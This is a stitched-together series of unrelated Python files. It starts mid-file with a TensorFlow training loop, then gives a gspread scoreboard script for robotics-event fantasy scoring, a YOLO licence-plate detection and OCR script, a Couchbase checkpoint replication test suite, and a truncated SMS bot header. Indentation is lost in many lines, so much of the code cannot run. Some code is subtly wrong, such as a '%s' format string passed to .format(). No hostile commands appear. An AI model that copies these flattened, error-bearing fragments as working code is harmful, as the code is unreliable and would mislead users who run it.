train_op = tf.train.AdamOptimizer(0.0001).minimize(loss_op, name='train_op')
test_data, test_target =generate_random_train_data(TEST_NUM)
saver = tf.train.Saver(max_to_keep=100)
with tf.Session() as sess:
ckpt = tf.train.get_checkpoint_state(MODEL_DIR)
if ckpt:
        # Get the path to the most recently saved model from the checkpoint file
        last_model = ckpt.model_checkpoint_path
        print("load {}".format(last_model))
        # Restore the trained model
        saver.restore(sess, last_model)
    else:
        print("initialization")
        # Initialize all variables
init_op = tf.global_variables_initializer()
sess.run(init_op)
writer = tf.summary.FileWriter(SUMMARY_LOG_DIR, sess.graph)
start_time, start_clock = time.time(), time.clock()
    # Start threads that build mini-batches with the training-data generator and push them into the queue via enqueue_op
    for i in range(N_THREADS):
        enqueue_thread = threading.Thread(target=load_and_enqueue, args=[sess])
        enqueue_thread.daemon = True  # isDaemon() only read the flag; set daemon=True so the thread exits with the main thread
enqueue_thread.start()
    step = 0 # keep the step count in a variable so it can be recorded in the model at the end
    try:
        # Get the last recorded step
        _step = sess.run(variable_step)
        print("learned step:{}".format(_step))
        # Print accuracy at the start of training
        print(sess.run(accuracy, feed_dict={placeholder_batch_size:BATCH_SIZE}))
for step in range(_step+1, TARGET_STEP+1):
batch_loss=0
w_summary=None
_, batch_loss, w_summary = sess.run([train_op, loss_op, summary_op],
feed_dict={placeholder_batch_size:BATCH_SIZE})
if step % 1000 == 0:
if not w_summary is None:
writer.add_summary(w_summary, step)
ac = sess.run(accuracy, feed_dict={placeholder_batch_size:BATCH_SIZE})
            # Check accuracy on the test data
test_accuracy = accuracy.eval({'queue/dequeue_op:0':test_data,
'queue/dequeue_op:1':test_target})
if step % 10000 == 0:
print("Step:%d accuracy:%.8f test_accuracy:%.8f loss:%.8f time:%.8f clock:%.14f" % (step,ac,test_accuracy,batch_loss,time.time()-start_time,time.clock()-start_clock))
            # Save every 1,000,000 steps
            if step % 1000000 == 0:
                _step = sess.run(step_op,feed_dict={placeholder_step:step}) # record the step in variable_step
                saver.save(sess, MODEL_DIR + '/model-'+str(step)+'.ckpt')
except:
import traceback
traceback.print_exc()
finally:
sess.run(queue.close(cancel_pending_enqueues=True))
pass
    # If any new steps were trained, record the step count and save the model
    if step > _step:
        _step = sess.run(step_op,feed_dict={placeholder_step:step}) # record the step in variable_step
        saver.save(sess, MODEL_DIR + '/model-'+str(step)+'.ckpt')
    # Generate fresh test data and check accuracy
test_data, test_target =generate_random_train_data(TEST_NUM)
print('Accuracy:',accuracy.eval({dequeue_input_data:test_data,
dequeue_input_target:test_target}))
    # Print the total number of steps
print('step:{}'.format(sess.run(variable_step)))
print("end")
|
scoreboard.py
|
from oauth2client.service_account import ServiceAccountCredentials
import gspread
from tba import *
import draft
import settings
import threading
import csv  # csv.DictReader is used below when reading the admin/participant files
"""scoreboard.py: Automatically updates the scoreboard. Thanks TBA"""
TITLE = settings.SCOREBOARD_TITLE
def auth(creds_file):
scope = [
'https://spreadsheets.google.com/feeds',
'https://www.googleapis.com/auth/drive.file'
]
credentials = ServiceAccountCredentials.from_json_keyfile_name(creds_file, scope)
gc = gspread.authorize(credentials)
return gc
def get_scoreboard(gc):
title = TITLE
try:
sh = gc.open(title)
except gspread.exceptions.SpreadsheetNotFound:
return False
return sh.get_worksheet(0)
def create_scoreboard(creds_file, admin_file, participants_file):
gc = auth(creds_file)
title = TITLE
sh = get_scoreboard(gc)
if not sh:
sh = gc.create(title)
admin_csv = open(admin_file, 'r')
admin_csv_reader = csv.DictReader(admin_csv, delimiter="\t")
for i in admin_csv_reader:
sh.share(i['Email'], perm_type='user', role='writer')
participants_csv = open(participants_file, 'r')
participants_csv_reader = csv.DictReader(participants_csv, delimiter="\t")
names = []
for i in participants_csv_reader:
names.append(i['Name'])
wks = sh.get_worksheet(0)
wks.update_acell('A1', 'Name')
for i in range(7):
wks.update_cell(1, i + 2, 'Week {}'.format(i + 1))
for i in range(len(names)):
cell = "A{}".format(i+2)
name = names[i]
wks.update_acell(cell, name)
def score_week(creds_file, week, year, award_scoring):
gc = auth(creds_file)
wks = get_scoreboard(gc)
dft = draft.get_draft(gc, week)
col = wks.find('Week {}'.format(week)).col
names = [x for x in wks.col_values(1)[1:] if x != ""]
threads = []
for name in names:
t = threading.Thread(target=score_player, args=(dft, wks, col, name, week, year, award_scoring,))
threads.append(t)
t.start()
def score_player(dft, wks, col, name, week, year, award_scoring):
dftrow = dft.find(name).row
picks = [x for x in dft.row_values(dftrow)[1:] if x != ""]
score = 0
for pick in picks:
score += score_team(pick, week, year, award_scoring, name, False)
wks.update_cell(wks.find(name).row, col, score)
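# Scoring summary (as implemented in score_team below): award points come from the TSV
# scoring file plus 2 per award won; reaching semis/finals adds 10 and quarterfinals adds 4;
# the event ranking score is added directly; finishing 1st / top-3 / top-8 / top-12 / top-16
# adds 20 / 12 / 6 / 3 / 2 points respectively.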
def score_team(number, week, year, award_scoring, player, debug):
team = Team.get_team(number)
if debug:
print("Number", number)
event = team.get_event_week(week, year)
if not event or event is None:
if debug:
print("TEAM MISSING EVENT: ", number)
return 0
event_key = event.get_key()
if debug:
print(event_key)
awards = team.get_awards(event_key)
csvfile = open(award_scoring, 'r').read()
csv = []
for i in csvfile.split("\n")[1:]:
csv.append(i.split("\t"))
score = 0
for award in awards:
type = award.get_type()
for i in csv:
print(i[1])
if str(type) == str(i[1]):
if debug:
print(i[0], int(i[2]))
score += int(i[2])
break
score += 2
if debug:
print("score", score)
matches = team.get_matches(event_key)
highest_level = 0
for match in matches:
if match.get_level() == 'qf':
if highest_level < 1:
highest_level = 1
elif match.get_level() == 'sf':
if highest_level < 2:
highest_level = 2
elif match.get_level() == 'f':
highest_level = 2
if highest_level == 2:
if debug:
print('semi')
score += 10
elif highest_level == 1:
if debug:
print('quarter')
score += 4
ranking_score = event.get_team_stat_number(number, 2)
if debug:
print("ranking score", ranking_score)
score += int(ranking_score)
ranking = event.get_team_ranking(number)
if debug:
print("team:ranking",number,ranking)
if ranking is None and debug:
print("Missing", number)
elif ranking == 1:
score += 20
elif ranking <= 3:
score += 12
elif ranking <= 8:
score += 6
elif ranking <= 12:
score += 3
elif ranking <= 16:
score += 2
if debug:
print(ranking)
print(score)
print(player, number, score, sep='\t')
return score
|
darknet_video.py
|
from ctypes import *
import math
import random
import os
import cv2
import numpy as np
import time
import darknet
import pytesseract
from skimage import measure
import threading
from scipy.spatial import distance as dist
from collections import OrderedDict
from multiprocessing import Process, Lock
lic_pl = cv2.imread("test.png")
f=False
class CentroidTracker:
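    # Simple centroid tracker: each new detection centroid is matched to the nearest
    # previously tracked centroid; unmatched detections are registered as new IDs, and
    # objects unseen for maxDisappeared consecutive frames are deregistered.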
def __init__(self,maxDisappeared=30):
self.nextObjectID = 0
self.objects = OrderedDict()
self.disappeared = OrderedDict()
self.maxDisappeared = maxDisappeared
def register(self, centroid):
self.objects[self.nextObjectID] = centroid
self.disappeared[self.nextObjectID] = 0
self.nextObjectID+=1
def deregister(self, objectID):
del self.objects[objectID]
del self.disappeared[objectID]
def update(self, rects):
if len(rects) == 0:
for objectID in list(self.disappeared.keys()):
self.disappeared[objectID] += 1
if self.disappeared[objectID] >= self.maxDisappeared:
self.deregister(objectID)
return self.objects
inputCentroids = np.zeros((len(rects),2), dtype="int")
for (i, (cX,cY)) in enumerate(rects):
inputCentroids[i] = (cX,cY)
if len(self.objects)==0:
for i in range(len(inputCentroids)):
self.register(inputCentroids[i])
else:
objectIDs = list(self.objects.keys())
objectCentroids = list(self.objects.values())
D = dist.cdist(np.array(objectCentroids), inputCentroids)
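            # Greedily match tracked objects (rows) to new centroids (cols): rows are
            # visited in order of their smallest distance, each taking its nearest column.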
rows = D.min(axis=1).argsort()
cols = D.argmin(axis=1)[rows]
usedRows = set()
usedCols = set()
for (row,col) in zip(rows,cols):
if row in usedRows or col in usedCols:
continue
objectID = objectIDs[row]
self.objects[objectID] = inputCentroids[col]
self.disappeared[objectID] = 0
usedRows.add(row)
usedCols.add(col)
unusedRows = set(range(0,D.shape[0])).difference(usedRows)
unusedCols = set(range(0,D.shape[1])).difference(usedCols)
if D.shape[0]>=D.shape[1]:
for row in unusedRows:
objectID = objectIDs[row]
self.disappeared[objectID] += 1
if self.disappeared[objectID] > self.maxDisappeared:
self.deregister(objectID)
else:
for col in unusedCols:
self.register(inputCentroids[col])
return self.objects
def convertBack(x, y, w, h):
xmin = int(round(x - (w / 2)))
xmax = int(round(x + (w / 2)))
ymin = int(round(y - (h / 2)))
ymax = int(round(y + (h / 2)))
return xmin, ymin, xmax, ymax
def ocr():
global lic_pl, f
while(True):
if(f==True):
configuration = ("-l eng --oem 1 --psm 8")
text = pytesseract.image_to_string(lic_pl, config=configuration)
print(text)
cv2.imshow("d",lic_pl)
cv2.waitKey(3)
f=False
def cvDrawBoxes(detections, img):
global lic_pl, f
#img = cv2.resize(img,(1920,1080),interpolation = cv2.INTER_AREA)
for detection in detections:
if detection[0]==b'PLATE':
x, y, w, h = detection[2][0],\
detection[2][1],\
detection[2][2],\
detection[2][3]
#print(x,y)
xmin, ymin, xmax, ymax = convertBack(
float(x), float(y), float(w), float(h))
pt1 = (int((xmin/416.0)*img.shape[1]), int((ymin/416.0)*img.shape[0]))
pt2 = (int((xmax/416.0)*img.shape[1]), int((ymax/416.0)*img.shape[0]))
#pt1 = (xmin, ymin)
#pt2 = (xmax,ymax)
#print(pt1, pt2)
cv2.rectangle(img, pt1, pt2, (0, 255, 0), 1)
cv2.putText(img,
detection[0].decode() +
" [" + str(round(detection[1] * 100, 2)) + "]",
(pt1[0], pt1[1] - 5), cv2.FONT_HERSHEY_SIMPLEX, 0.5,
[0, 255, 0], 2)
org_img = img[pt1[1]:pt2[1],pt1[0]:pt2[0]]
hsv = cv2.cvtColor(org_img, cv2.COLOR_BGR2GRAY)
blur = cv2.GaussianBlur(hsv,(5,5),0)
ret3,binary_img = cv2.threshold(blur,0,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)
c_img = cv2.bitwise_not(binary_img)
#cv2.imshow("tes",binary_img)
#cv2.waitKey(0)
image, contours, hier = cv2.findContours(c_img, cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_NONE)
contours = sorted(contours, key=lambda ctr: cv2.boundingRect(ctr)[0])
xmin=30
character_dimensions = (0.25*org_img.shape[0], 0.70*org_img.shape[0], 0.01*org_img.shape[1], 0.25*org_img.shape[1])
min_height, max_height, min_width, max_width = character_dimensions
new_im = cv2.imread("test.png")
d=0
for ctr in contours:
# Get bounding box
x, y, w, h = cv2.boundingRect(ctr)
# Getting ROI
if w>min_width and w<max_width and h>min_height and h<max_height:
d+=1
roi = cv2.cvtColor(binary_img[y:y+h, x:x+w],cv2.COLOR_GRAY2RGB)
#char.append(cv2.resize(roi,(50,75),interpolation = cv2.INTER_AREA))
new_im[38:113, xmin:xmin+50] = cv2.resize(roi,(50,75),interpolation = cv2.INTER_AREA)
xmin+=70
#cv2.imshow('character',roi)
#cv2.imwrite('character_%d.png'%d, roi)
#cv2.waitKey(0)
#cv2.destroyAllWindows()
cv2.imshow("d",new_im[:,:xmin])
cv2.waitKey(3)
if d>6 and d<11:
lic_pl = new_im[:,:xmin]
configuration = ("-l eng --oem 1 --psm 8")
text = pytesseract.image_to_string(new_im[:,:xmin], config=configuration)
print(text)
return img
netMain = None
metaMain = None
altNames = None
def YOLO():
global metaMain, netMain, altNames
configPath = "yolov3test.cfg"
weightPath = "yolov3test_last.weights"
metaPath = "obj.data"
if not os.path.exists(configPath):
raise ValueError("Invalid config path `" +
os.path.abspath(configPath)+"`")
if not os.path.exists(weightPath):
raise ValueError("Invalid weight path `" +
os.path.abspath(weightPath)+"`")
if not os.path.exists(metaPath):
raise ValueError("Invalid data file path `" +
os.path.abspath(metaPath)+"`")
if netMain is None:
netMain = darknet.load_net_custom(configPath.encode(
"ascii"), weightPath.encode("ascii"), 0, 1) # batch size = 1
if metaMain is None:
metaMain = darknet.load_meta(metaPath.encode("ascii"))
if altNames is None:
try:
with open(metaPath) as metaFH:
metaContents = metaFH.read()
import re
match = re.search("names *= *(.*)$", metaContents,
re.IGNORECASE | re.MULTILINE)
if match:
result = match.group(1)
else:
result = None
try:
if os.path.exists(result):
with open(result) as namesFH:
namesList = namesFH.read().strip().split("\n")
altNames = [x.strip() for x in namesList]
except TypeError:
pass
except Exception:
pass
cap = cv2.VideoCapture(0)
cap = cv2.VideoCapture("tt.mp4")
cap.set(3, 1280)
cap.set(4, 720)
out = cv2.VideoWriter(
"output.avi", cv2.VideoWriter_fourcc(*"MJPG"), 10.0,
(darknet.network_width(netMain), darknet.network_height(netMain)))
print("Starting the YOLO loop...")
# Create an image we reuse for each detect
darknet_image = darknet.make_image(darknet.network_width(netMain),
darknet.network_height(netMain),3)
while True:
prev_time = time.time()
ret, frame_read = cap.read()
if ret==False:
break
frame_rgb = cv2.cvtColor(frame_read, cv2.COLOR_BGR2RGB)
frame_resized = cv2.resize(frame_rgb,
(darknet.network_width(netMain),
darknet.network_height(netMain)),
interpolation=cv2.INTER_LINEAR)
darknet.copy_image_from_bytes(darknet_image,frame_resized.tobytes())
detections = darknet.detect_image(netMain, metaMain, darknet_image, thresh=0.25)
#print(detections)
image = cvDrawBoxes(detections, frame_rgb)
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
print(1/(time.time()-prev_time))
#cv2.imshow('Demo', image)
#cv2.waitKey(3)
#cv2.imwrite('Demo.png', image)
#cv2.waitKey(3)
cap.release()
out.release()
if __name__ == "__main__":
p = Process(target=YOLO)
p.start()
|
checkpoint.py
|
import re
import time
import uuid
import logger
from threading import Thread
from tasks.future import TimeoutError
from couchbase_helper.cluster import Cluster
from couchbase_helper.stats_tools import StatsCommon
from membase.api.rest_client import RestConnection
from membase.helper.cluster_helper import ClusterOperationHelper
from basetestcase import BaseTestCase
from couchbase_helper.documentgenerator import BlobGenerator
from remote.remote_util import RemoteMachineShellConnection
import testconstants
ACTIVE = "active"
REPLICA1 = "replica1"
REPLICA2 = "replica2"
REPLICA3 = "replica3"
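# Each state name is mapped to the concrete server holding that copy of vbucket 0
# by _get_server_by_state() in setUp.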
class CheckpointTests(BaseTestCase):
def setUp(self):
super(CheckpointTests, self).setUp()
self.checkpoint_size = self.input.param("checkpoint_size", 5000)
self.value_size = self.input.param("value_size", 256)
self.timeout = self.input.param("timeout", 60)
servers_in = [self.servers[i + 1] for i in range(self.num_servers - 1)]
self.cluster.rebalance(self.servers[:1], servers_in, [])
self.bucket = self.buckets[0]
self.master = self._get_server_by_state(self.servers[:self.num_servers], self.bucket, ACTIVE)
if self.num_servers > 1:
self.replica1 = self._get_server_by_state(self.servers[:self.num_servers], self.bucket, REPLICA1)
if self.num_servers > 2:
self.replica2 = self._get_server_by_state(self.servers[:self.num_servers], self.bucket, REPLICA2)
if self.num_servers > 3:
self.replica3 = self._get_server_by_state(self.servers[:self.num_servers], self.bucket, REPLICA3)
def tearDown(self):
super(CheckpointTests, self).tearDown()
def checkpoint_create_items(self):
"""Load data until a new checkpoint is created on all replicas"""
param = 'checkpoint'
stat_key = 'vb_0:open_checkpoint_id'
self._set_checkpoint_size(self.servers[:self.num_servers], self.bucket, str(self.checkpoint_size))
chk_stats = StatsCommon.get_stats([self.master], self.bucket, param, stat_key)
generate_load = BlobGenerator('nosql', 'nosql-', self.value_size, end=self.num_items)
self._load_all_buckets(self.master, generate_load, "create", 0, 1, 0, True, batch_size=self.checkpoint_size, pause_secs=5, timeout_secs=180)
self._wait_for_stats_all_buckets(self.servers[:self.num_servers])
self._verify_checkpoint_id(param, stat_key, chk_stats)
self._verify_stats_all_buckets(self.servers[:self.num_servers])
def checkpoint_create_time(self):
"""Load data, but let the timeout create a new checkpoint on all replicas"""
param = 'checkpoint'
stat_key = 'vb_0:open_checkpoint_id'
self._set_checkpoint_timeout(self.servers[:self.num_servers], self.bucket, str(self.timeout))
generate_load = BlobGenerator('nosql', 'nosql-', self.value_size, end=self.num_items)
self._load_all_buckets(self.master, generate_load, "create", 0, 1, 0, True, batch_size=self.checkpoint_size, pause_secs=5, timeout_secs=180)
self._wait_for_stats_all_buckets(self.servers[:self.num_servers])
chk_stats = StatsCommon.get_stats([self.master], self.bucket, param, stat_key)
self.log.info("Sleeping for {0} seconds)".format(self.timeout + 5))
time.sleep(self.timeout + 5)
self._verify_checkpoint_id(param, stat_key, chk_stats)
self._verify_stats_all_buckets(self.servers[:self.num_servers])
def checkpoint_replication_pause(self):
"""With 3 replicas load data. pause replication to R2. Let checkpoints close on Master and R1.
Restart replication of R2 and R3, backfill should not be seen on R1 and R2."""
param = 'checkpoint'
stat_key = 'vb_0:last_closed_checkpoint_id'
self._set_checkpoint_size(self.servers[:self.num_servers], self.bucket, str(self.checkpoint_size))
time.sleep(5)
prev_backfill_timestamp_R1 = self._get_backfill_timestamp(self.replica1, self.replica2)
prev_backfill_timestamp_R2 = self._get_backfill_timestamp(self.replica2, self.replica3)
generate_load = BlobGenerator('nosql', 'nosql-', self.value_size, end=self.num_items)
data_load_thread = Thread(target=self._load_all_buckets,
name="load_data",
args=(self.master, generate_load, "create", 0, 1, 0, True, self.checkpoint_size, 5, 180))
data_load_thread.start()
self._stop_replication(self.replica2, self.bucket)
m_stats = StatsCommon.get_stats([self.master], self.bucket, param, stat_key)
chk_pnt = int(m_stats[m_stats.keys()[0]]) + 2
tasks = []
tasks.append(self.cluster.async_wait_for_stats([self.master], self.bucket, param, stat_key,
'>=', chk_pnt))
tasks.append(self.cluster.async_wait_for_stats([self.replica1], self.bucket, param, stat_key,
'>=', chk_pnt))
for task in tasks:
try:
task.result(60)
except TimeoutError:
self.fail("Checkpoint not closed")
data_load_thread.join()
self._start_replication(self.replica2, self.bucket)
self._verify_checkpoint_id(param, stat_key, m_stats)
self._verify_stats_all_buckets(self.servers[:self.num_servers])
self._verify_backfill_happen(self.replica1, self.replica2, prev_backfill_timestamp_R1)
self._verify_backfill_happen(self.replica2, self.replica3, prev_backfill_timestamp_R2)
def checkpoint_collapse(self):
"""With 3 replicas, stop replication on R2, let Master and R1 close checkpoint.
Run load until a new checkpoint is created on Master and R1.
Wait till checkpoints merge on R1. Restart replication of R2.
Checkpoint should advance to the latest on R2."""
param = 'checkpoint'
stat_key = 'vb_0:last_closed_checkpoint_id'
stat_chk_itms = 'vb_0:num_checkpoint_items'
self._set_checkpoint_size(self.servers[:self.num_servers], self.bucket, str(self.checkpoint_size))
self._stop_replication(self.replica2, self.bucket)
generate_load = BlobGenerator('nosql', 'nosql-', self.value_size, end=self.num_items)
data_load_thread = Thread(target=self._load_all_buckets,
name="load_data",
args=(self.master, generate_load, "create", 0, 1, 0, True, self.checkpoint_size, 5, 180))
data_load_thread.start()
m_stats = StatsCommon.get_stats([self.master], self.bucket, param, stat_key)
tasks = []
chk_pnt = int(m_stats[m_stats.keys()[0]]) + 2
tasks.append(self.cluster.async_wait_for_stats([self.master], self.bucket, param, stat_key,
'>=', chk_pnt))
tasks.append(self.cluster.async_wait_for_stats([self.replica1], self.bucket, param, stat_key,
'>=', chk_pnt))
tasks.append(self.cluster.async_wait_for_stats([self.replica1], self.bucket, param,
stat_chk_itms, '>=', self.num_items))
data_load_thread.join()
for task in tasks:
try:
task.result(60)
except TimeoutError:
self.fail("Checkpoint not collapsed")
tasks = []
self._start_replication(self.replica2, self.bucket)
tasks.append(self.cluster.async_wait_for_stats([self.replica1], self.bucket, param,
stat_chk_itms, '<', self.num_items))
for task in tasks:
try:
task.result(60)
except TimeoutError:
self.fail("Checkpoints not replicated to replica2")
self._verify_checkpoint_id(param, stat_key, m_stats)
self._verify_stats_all_buckets(self.servers[:self.num_servers])
def checkpoint_deduplication(self):
"""Disable replication of R1. Load N items to master, then mutate some of them.
Restart replication of R1, only N items should be in stats. In this test, we can
only load number of items <= checkpoint_size to observe deduplication"""
param = 'checkpoint'
stat_key = 'vb_0:num_open_checkpoint_items'
stat_key_id = 'vb_0:open_checkpoint_id'
self._set_checkpoint_size(self.servers[:self.num_servers], self.bucket, self.checkpoint_size)
self._stop_replication(self.replica1, self.bucket)
generate_load = BlobGenerator('nosql', 'nosql-', self.value_size, end=self.num_items)
generate_update = BlobGenerator('nosql', 'sql-', self.value_size, end=self.num_items)
self._load_all_buckets(self.master, generate_load, "create", 0, 1, 0, True, batch_size=self.checkpoint_size, pause_secs=5, timeout_secs=180)
self._wait_for_stats_all_buckets([self.master, self.replica2, self.replica3])
m_stats = StatsCommon.get_stats([self.master], self.bucket, param, stat_key_id)
data_load_thread = Thread(target=self._load_all_buckets,
name="load_data",
args=(self.master, generate_update, "update", 0, 1, 0, True, self.checkpoint_size, 5, 180))
data_load_thread.start()
self._start_replication(self.replica1, self.bucket)
data_load_thread.join()
chk_pnt = int(m_stats[m_stats.keys()[0]])
timeout = 60 if (self.num_items * .001) < 60 else self.num_items * .001
time.sleep(timeout)
tasks = []
tasks.append(self.cluster.async_wait_for_stats([self.master], self.bucket, param,
stat_key, '==', self.num_items))
tasks.append(self.cluster.async_wait_for_stats([self.replica1], self.bucket, param,
stat_key, '==', self.num_items))
tasks.append(self.cluster.async_wait_for_stats([self.master], self.bucket, param,
stat_key_id, '==', chk_pnt))
tasks.append(self.cluster.async_wait_for_stats([self.replica1], self.bucket, param,
stat_key_id, '==', chk_pnt))
for task in tasks:
try:
task.result(60)
except TimeoutError:
self.fail("Items weren't deduplicated")
self._verify_stats_all_buckets(self.servers[:self.num_servers])
def checkpoint_failover_master(self):
"""Load N items. During the load, failover Master.
Verify backfill doesn't happen on R1, R2."""
param = 'checkpoint'
stat_key = 'vb_0:open_checkpoint_id'
rest = RestConnection(self.master)
nodes = rest.node_statuses()
failover_node = None
for node in nodes:
if node.id.find(self.master.ip) >= 0:
failover_node = node
self._set_checkpoint_size(self.servers[:self.num_servers], self.bucket, self.checkpoint_size)
generate_load = BlobGenerator('nosql', 'nosql-', self.value_size, end=self.num_items)
data_load_thread = Thread(target=self._load_all_buckets,
name="load_data",
args=(self.master, generate_load, "create", 0, 1, 0, True, self.checkpoint_size, 5, 180))
data_load_thread.start()
time.sleep(5)
prev_backfill_timestamp_R1 = self._get_backfill_timestamp(self.replica1, self.replica2)
prev_backfill_timestamp_R2 = self._get_backfill_timestamp(self.replica2, self.replica3)
failed_over = rest.fail_over(failover_node.id)
if not failed_over:
self.log.info("unable to failover the node the first time. try again in 60 seconds..")
#try again in 60 seconds
time.sleep(75)
failed_over = rest.fail_over(failover_node.id)
self.assertTrue(failed_over, "unable to failover node %s" % (self.master.ip))
self.log.info("failed over node : {0}".format(failover_node.id))
data_load_thread.join()
self._verify_backfill_happen(self.replica1, self.replica2, prev_backfill_timestamp_R1)
self._verify_backfill_happen(self.replica2, self.replica3, prev_backfill_timestamp_R2)
self.cluster.rebalance(self.servers[:self.num_servers], [], [self.master])
self.cluster.rebalance(self.servers[1:self.num_servers], [self.master], [])
def checkpoint_replication_pause_failover(self):
"""Load N items. Stop replication R3. Load N' more items.
Failover R2. When restart replication to R3, verify backfill doesn't happen on R1."""
param = 'checkpoint'
stat_key = 'vb_0:open_checkpoint_id'
rest = RestConnection(self.master)
nodes = rest.node_statuses()
failover_node = None
for node in nodes:
if node.id.find(self.replica2.ip) >= 0:
failover_node = node
self._set_checkpoint_size(self.servers[:self.num_servers], self.bucket, self.checkpoint_size)
generate_load_one = BlobGenerator('nosql', 'nosql-', self.value_size, end=self.num_items)
self._load_all_buckets(self.master, generate_load_one, "create", 0, 1, 0, True, batch_size=self.checkpoint_size, pause_secs=5, timeout_secs=180)
self._wait_for_stats_all_buckets(self.servers[:self.num_servers])
prev_backfill_timestamp_R1 = self._get_backfill_timestamp(self.replica1, self.replica2)
m_stats = StatsCommon.get_stats([self.master], self.bucket, param, stat_key)
self._stop_replication(self.replica3, self.bucket)
generate_load_two = BlobGenerator('sqlite', 'sqlite-', self.value_size, end=self.num_items)
data_load_thread = Thread(target=self._load_all_buckets,
name="load_data",
args=(self.master, generate_load_two, "create", 0, 1, 0, True, self.checkpoint_size, 5, 180))
data_load_thread.start()
failed_over = rest.fail_over(failover_node.id)
if not failed_over:
self.log.info("unable to failover the node the first time. try again in 60 seconds..")
#try again in 60 seconds
time.sleep(75)
failed_over = rest.fail_over(failover_node.id)
self.assertTrue(failed_over, "unable to failover node %s".format(self.replica2.ip))
self.log.info("failed over node : {0}".format(failover_node.id))
data_load_thread.join()
self._start_replication(self.replica3, self.bucket)
self.servers = []
self.servers = [self.master, self.replica1, self.replica3]
self.num_servers = len(self.servers)
self._verify_checkpoint_id(param, stat_key, m_stats)
self._verify_stats_all_buckets(self.servers[:self.num_servers])
self._verify_backfill_happen(self.replica1, self.replica2, prev_backfill_timestamp_R1)
self.cluster.rebalance([self.master, self.replica1, self.replica2, self.replica3], [], [self.replica2])
self.cluster.rebalance([self.master, self.replica1, self.replica3], [self.replica2], [])
def checkpoint_server_down(self):
"""Load N items. Shut down server R2. Then Restart R2 and
verify backfill happens on R1 and R2."""
param = 'checkpoint'
stat_key = 'vb_0:open_checkpoint_id'
rest = RestConnection(self.master)
self._set_checkpoint_size(self.servers[:self.num_servers], self.bucket, self.checkpoint_size)
generate_load_one = BlobGenerator('nosql', 'nosql-', self.value_size, end=self.num_items)
self._load_all_buckets(self.master, generate_load_one, "create", 0, 1, 0, True, batch_size=self.checkpoint_size, pause_secs=5, timeout_secs=180)
self._wait_for_stats_all_buckets(self.servers[:self.num_servers])
prev_backfill_timestamp_R1 = self._get_backfill_timestamp(self.replica1, self.replica2)
prev_backfill_timestamp_R2 = self._get_backfill_timestamp(self.replica2, self.replica3)
m_stats = StatsCommon.get_stats([self.master], self.bucket, param, stat_key)
self._stop_server(self.replica2)
time.sleep(5)
data_load_thread = Thread(target=self._load_data_use_workloadgen, name="load_data", args=(self.master,))
data_load_thread.start()
data_load_thread.join()
self._start_server(self.replica2)
time.sleep(5)
self._verify_checkpoint_id(param, stat_key, m_stats)
self._verify_backfill_happen(self.replica1, self.replica2, prev_backfill_timestamp_R1, True)
self._verify_backfill_happen(self.replica2, self.replica3, prev_backfill_timestamp_R2, True)
def _verify_checkpoint_id(self, param, stat_key, m_stats):
timeout = 60 if (self.num_items * .001) < 60 else self.num_items * .001
        # verify checkpoint id increases on the master node
chk_pnt = int(m_stats[m_stats.keys()[0]])
tasks = []
tasks.append(self.cluster.async_wait_for_stats([self.master], self.bucket, param, stat_key, '>', chk_pnt))
for task in tasks:
try:
task.result(timeout)
except TimeoutError:
self.fail("New checkpoint not created")
time.sleep(timeout / 10)
# verify Master and all replicas are in sync with checkpoint ids
m_stats = StatsCommon.get_stats([self.master], self.bucket, param, stat_key)
chk_pnt = int(m_stats[m_stats.keys()[0]])
tasks = []
for server in self.servers:
tasks.append(self.cluster.async_wait_for_stats([server], self.bucket, param, stat_key, '==', chk_pnt))
for task in tasks:
try:
task.result(timeout)
except TimeoutError:
self.fail("Master and all replicas are NOT in sync with checkpoint ids")
def _get_backfill_timestamp(self, server, replica_server):
param = 'tap'
stat_key = 'eq_tapq:replication_ns_1@%s:backfill_start_timestamp' % (replica_server.ip)
m_stats = StatsCommon.get_stats([server], self.bucket, param, stat_key)
self.log.info("eq_tapq:replication_ns_1@%s:backfill_start_timestamp: %s" % (replica_server.ip, m_stats[m_stats.keys()[0]]))
return int(m_stats[m_stats.keys()[0]])
def _verify_backfill_happen(self, server, replica_server, previous_timestamp, backfill_happen=False):
current_timestamp = self._get_backfill_timestamp(server, replica_server)
if (current_timestamp - previous_timestamp) < 0:
raise Exception("cbstats tap backfill_start_timestamp doesn't work properly, which fails the test.")
if backfill_happen:
if (current_timestamp - previous_timestamp) == 0:
raise Exception("Backfill doesn't happen as expected! Test fails")
else:
if (current_timestamp - previous_timestamp) > 0:
raise Exception("Backfill happens unexpectedly! Test fails")
def _set_checkpoint_size(self, servers, bucket, size):
ClusterOperationHelper.flushctl_set(servers[0], 'chk_max_items', size, bucket)
def _set_checkpoint_timeout(self, servers, bucket, time):
ClusterOperationHelper.flushctl_set(servers[0], 'chk_period', time, bucket)
def _stop_replication(self, server, bucket):
shell = RemoteMachineShellConnection(server)
shell.execute_cbepctl(self.bucket, "stop", "", "", 0)
shell.execute_cbepctl(self.bucket, "", "set tap_param", "tap_throttle_queue_cap", 10)
shell.disconnect()
def _start_replication(self, server, bucket):
shell = RemoteMachineShellConnection(server)
shell.execute_cbepctl(self.bucket, "start", "", "", 0)
shell.execute_cbepctl(self.bucket, "", "set tap_param", "tap_throttle_queue_cap", 1000000)
shell.disconnect()
def _stop_server(self, server):
shell = RemoteMachineShellConnection(server)
shell.stop_server()
shell.disconnect()
def _start_server(self, server):
shell = RemoteMachineShellConnection(server)
shell.start_server()
shell.disconnect()
def _load_data_use_workloadgen(self, server):
os = "linux"
shell = RemoteMachineShellConnection(server)
if os == "linux":
command = "%stools/cbworkloadgen -n %s:8091 -i %s" % (testconstants.LINUX_COUCHBASE_BIN_PATH, server.ip, self.num_items)
output, error = shell.execute_command(command)
shell.log_command_output(output, error)
shell.disconnect()
def _get_server_by_state(self, servers, bucket, vb_state):
rest = RestConnection(servers[0])
vbuckets = rest.get_vbuckets(bucket)[0]
addr = None
if vb_state == ACTIVE:
addr = vbuckets.master
elif vb_state == REPLICA1:
addr = vbuckets.replica[0].encode("ascii", "ignore")
elif vb_state == REPLICA2:
addr = vbuckets.replica[1].encode("ascii", "ignore")
elif vb_state == REPLICA3:
addr = vbuckets.replica[2].encode("ascii", "ignore")
else:
return None
addr = addr.split(':', 1)[0]
for server in servers:
if addr == server.ip:
return server
return None
|
sms_bot.py
|
import time
from datetime import datetime
from threading import Thread
from Bot.sms_handler import SmsHandler
from trade_backend.trader import CustomTimeZone
class SmsBot:
KARIMS_PHONE_NUMBER = "+"
